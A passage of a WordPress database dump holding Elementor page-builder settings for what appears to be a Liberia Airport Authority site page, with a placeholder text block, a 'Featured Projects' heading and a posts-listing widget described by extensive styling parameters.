up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(18264,2687,'_elementor_edit_mode','builder'),(18265,2687,'_elementor_template_type','wp-post'),(18266,2687,'_elementor_version','2.7.5'),(18267,2687,'_wp_page_template','default'),(18268,2687,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\",\"block_title\":\"\",\"title_tag\":\"h2\",\"featured_position\":\"left\",\"featured_width\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"featured_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_layout\":\"boxed\",\"featured_image_size\":\"full\",\"featured_image_position\":\"top\",\"featured_image_width\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"featured_image_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_image_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_title_length\":0,\"featured_excerpt_length\":20,\"featured_read_more\":\"yes\",\"featured_show_meta\":\"yes\",\"featured_meta_position\":\"after\",\"featured_show_author\":\"yes\",\"featured_show_author_icon\":\"fa fa-user\",\"featured_show_date\":\"yes\",\"featured_show_date_icon\":\"fa fa-calendar\",\"featured_show_comments\":\"yes\",\"featured_show_comments_icon\":\"fa fa-comments\",\"show_featured_terms\":\"\",\"show_featured_terms_tax\":\"category\",\"posts_columns_tablet\":\"\",\"posts_columns_mobile\":\"\",\"posts_rows\":3,\"show_image\":\"yes\",\"image_width\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_length\":0,\"meta_position\":\"after\",\"show_author\":\"\",\"show_author_icon\":\"fa fa-user\",\"show_date\":\"yes\",\"show_date_icon\":\"fa fa-calendar\",\"show_comments\":\"\",\"show_comments_icon\":\"fa fa-comments\",\"show_terms\":\"\",\"is_archive_template\":\"\",\"query_by\":\"category\",\"category_ids\":\"\",\"post_tag_ids\":\"\",\"include_ids\":\"\",\"custom_query_by\":\"all\",\"post_ids\":\"\",\"exclude_ids\":\"\",\"meta_query\":\"\",\"meta_key\":\"\",\"meta_value\":\"\",\"show_filter\":\"\",\"filter_by\":\"category\",\"show_all_btn\":\"yes\",\"terms_rollup\":\"\",\"more_terms_icon\":\"fa fa-ellipsis-h\",\"show_arrows\":\"\",\"arrow_type\":\"fa fa-angle-left\",\"show_title_related_meta\":\"\",\"meta_title_related_position\":\"before\",\"show_content_related_meta\":\"\",\"meta_content_related_position\":\"before\",\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":0,\"right\":-10,\"bottom\":0,\"left\":-10,\"isLinked\":false},\"posts_wrapper_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_wrapper_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":10,\"right\":10,\"bottom\":10,\"left\":10,\"isLinked\":false},\"featured_post_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":0,\"right\":10,\"bottom\":0,\"left\":10,\"isLinked\":false},\"posts_list_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_background_background\":\"\",\"heading_background_color\":\"\",\"heading_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"heading_background_color_b\":\"#f2295b\",\"heading_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"heading_background_gradient_type\":\"linear\",\"heading_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"heading_background_gradient_position\":\"center center\",\"heading_background_image\":{\"url\":\"\",\"id\":\"\"},\"heading_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"heading_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"heading_background_position\":\"\",\"heading_background_position_tablet\":\"\",\"heading_background_position_mobile\":\"\",\"heading_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"heading_background_attachment\":\"\",\"heading_background_repeat\":\"\",\"heading_background_repeat_tablet\":\"\",\"heading_background_repeat_mobile\":\"\",\"heading_background_size\":\"\",\"heading_background_size_tablet\":\"\",\"heading_background_size_mobile\":\"\",\"heading_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"heading_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_background_video_link\":\"\",\"heading_background_video_start\":\"\",\"heading_background_video_end\":\"\",\"heading_background_play_once\":\"\",\"heading_background_play_on_mobile\":\"\",\"heading_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"heading_background_slideshow_gallery\":[],\"heading_background_slideshow_loop\":\"yes\",\"heading_background_slideshow_slide_duration\":5000,\"heading_background_slideshow_slide_transition\":\"fade\",\"heading_background_slideshow_transition_duration\":500,\"heading_background_slideshow_ken_burns\":\"\",\"heading_background_slideshow_ken_burns_zoom_direction\":\"in\",\"heading_border_border\":\"\",\"heading_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_border_color\":\"\",\"heading_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_box_shadow_box_shadow_type\":\"\",\"heading_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"heading_box_shadow_box_shadow_position\":\" \",\"heading_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_title_color\":\"\",\"heading_title_typography_typography\":\"\",\"heading_title_typography_font_family\":\"\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_font_weight\":\"\",\"heading_title_typography_text_transform\":\"\",\"heading_title_typography_font_style\":\"\",\"heading_title_typography_text_decoration\":\"\",\"heading_title_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"heading_title_padding\":{\"unit\":\"px\",\"top\":0,\"right\":0,\"bottom\":0,\"left\":0,\"isLinked\":true},\"heading_title_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_title_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_title_margin\":{\"unit\":\"px\",\"top\":0,\"right\":0,\"bottom\":0,\"left\":0,\"isLinked\":true},\"heading_title_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"heading_title_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_item_typography_typography\":\"\",\"filter_item_typography_font_family\":\"\",\"filter_item_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_font_weight\":\"\",\"filter_item_typography_text_transform\":\"\",\"filter_item_typography_font_style\":\"\",\"filter_item_typography_text_decoration\":\"\",\"filter_item_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_item_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_color\":\"\",\"filter_background_background\":\"\",\"filter_background_color\":\"\",\"filter_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"filter_background_color_b\":\"#f2295b\",\"filter_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_gradient_type\":\"linear\",\"filter_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"filter_background_gradient_position\":\"center center\",\"filter_background_image\":{\"url\":\"\",\"id\":\"\"},\"filter_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"filter_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"filter_background_position\":\"\",\"filter_background_position_tablet\":\"\",\"filter_background_position_mobile\":\"\",\"filter_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_attachment\":\"\",\"filter_background_repeat\":\"\",\"filter_background_repeat_tablet\":\"\",\"filter_background_repeat_mobile\":\"\",\"filter_background_size\":\"\",\"filter_background_size_tablet\":\"\",\"filter_background_size_mobile\":\"\",\"filter_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_video_link\":\"\",\"filter_background_video_start\":\"\",\"filter_background_video_end\":\"\",\"filter_background_play_once\":\"\",\"filter_background_play_on_mobile\":\"\",\"filter_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"filter_background_slideshow_gallery\":[],\"filter_background_slideshow_loop\":\"yes\",\"filter_background_slideshow_slide_duration\":5000,\"filter_background_slideshow_slide_transition\":\"fade\",\"filter_background_slideshow_transition_duration\":500,\"filter_background_slideshow_ken_burns\":\"\",\"filter_background_slideshow_ken_burns_zoom_direction\":\"in\",\"filter_border_border\":\"\",\"filter_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_color\":\"\",\"filter_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_box_shadow_box_shadow_type\":\"\",\"filter_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"filter_box_shadow_box_shadow_position\":\" \",\"filter_color_hover\":\"\",\"filter_background_hover_background\":\"\",\"filter_background_hover_color\":\"\",\"filter_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"filter_background_hover_color_b\":\"#f2295b\",\"filter_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_hover_gradient_type\":\"linear\",\"filter_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"filter_background_hover_gradient_position\":\"center center\",\"filter_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"filter_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"filter_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"filter_background_hover_position\":\"\",\"filter_background_hover_position_tablet\":\"\",\"filter_background_hover_position_mobile\":\"\",\"filter_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_hover_attachment\":\"\",\"filter_background_hover_repeat\":\"\",\"filter_background_hover_repeat_tablet\":\"\",\"filter_background_hover_repeat_mobile\":\"\",\"filter_background_hover_size\":\"\",\"filter_background_hover_size_tablet\":\"\",\"filter_background_hover_size_mobile\":\"\",\"filter_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_hover_video_link\":\"\",\"filter_background_hover_video_start\":\"\",\"filter_background_hover_video_end\":\"\",\"filter_background_hover_play_once\":\"\",\"filter_background_hover_play_on_mobile\":\"\",\"filter_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"filter_background_hover_slideshow_gallery\":[],\"filter_background_hover_slideshow_loop\":\"yes\",\"filter_background_hover_slideshow_slide_duration\":5000,\"filter_background_hover_slideshow_slide_transition\":\"fade\",\"filter_background_hover_slideshow_transition_duration\":500,\"filter_background_hover_slideshow_ken_burns\":\"\",\"filter_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"filter_border_hover_border\":\"\",\"filter_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_hover_color\":\"\",\"filter_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_box_shadow_hover_box_shadow_type\":\"\",\"filter_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"filter_box_shadow_hover_box_shadow_position\":\" \",\"filter_color_active\":\"\",\"filter_background_active_background\":\"\",\"filter_background_active_color\":\"\",\"filter_background_active_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"filter_background_active_color_b\":\"#f2295b\",\"filter_background_active_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_active_gradient_type\":\"linear\",\"filter_background_active_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"filter_background_active_gradient_position\":\"center center\",\"filter_background_active_image\":{\"url\":\"\",\"id\":\"\"},\"filter_background_active_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"filter_background_active_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"filter_background_active_position\":\"\",\"filter_background_active_position_tablet\":\"\",\"filter_background_active_position_mobile\":\"\",\"filter_background_active_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"filter_background_active_attachment\":\"\",\"filter_background_active_repeat\":\"\",\"filter_background_active_repeat_tablet\":\"\",\"filter_background_active_repeat_mobile\":\"\",\"filter_background_active_size\":\"\",\"filter_background_active_size_tablet\":\"\",\"filter_background_active_size_mobile\":\"\",\"filter_background_active_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"filter_background_active_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_active_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"filter_background_active_video_link\":\"\",\"filter_background_active_video_start\":\"\",\"filter_background_active_video_end\":\"\",\"filter_background_active_play_once\":\"\",\"filter_background_active_play_on_mobile\":\"\",\"filter_background_active_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"filter_background_active_slideshow_gallery\":[],\"filter_background_active_slideshow_loop\":\"yes\",\"filter_background_active_slideshow_slide_duration\":5000,\"filter_background_active_slideshow_slide_transition\":\"fade\",\"filter_background_active_slideshow_transition_duration\":500,\"filter_background_active_slideshow_ken_burns\":\"\",\"filter_background_active_slideshow_ken_burns_zoom_direction\":\"in\",\"filter_border_active_border\":\"\",\"filter_border_active_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_active_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_active_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_active_color\":\"\",\"filter_border_radius_active\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_active_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_border_radius_active_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_box_shadow_active_box_shadow_type\":\"\",\"filter_box_shadow_active_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"filter_box_shadow_active_box_shadow_position\":\" \",\"filter_item_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_item_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_item_margin\":{\"unit\":\"px\",\"top\":0,\"right\":0,\"bottom\":0,\"left\":10,\"isLinked\":true},\"filter_item_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"filter_alignment\":\"\",\"filter_alignment_tablet\":\"\",\"filter_alignment_mobile\":\"\",\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_typography\":\"\",\"hidden_item_typography_font_family\":\"\",\"hidden_item_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_font_weight\":\"\",\"hidden_item_typography_text_transform\":\"\",\"hidden_item_typography_font_style\":\"\",\"hidden_item_typography_text_decoration\":\"\",\"hidden_item_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_color\":\"\",\"hidden_item_color_hover\":\"\",\"hidden_wrap_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_wrap_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\"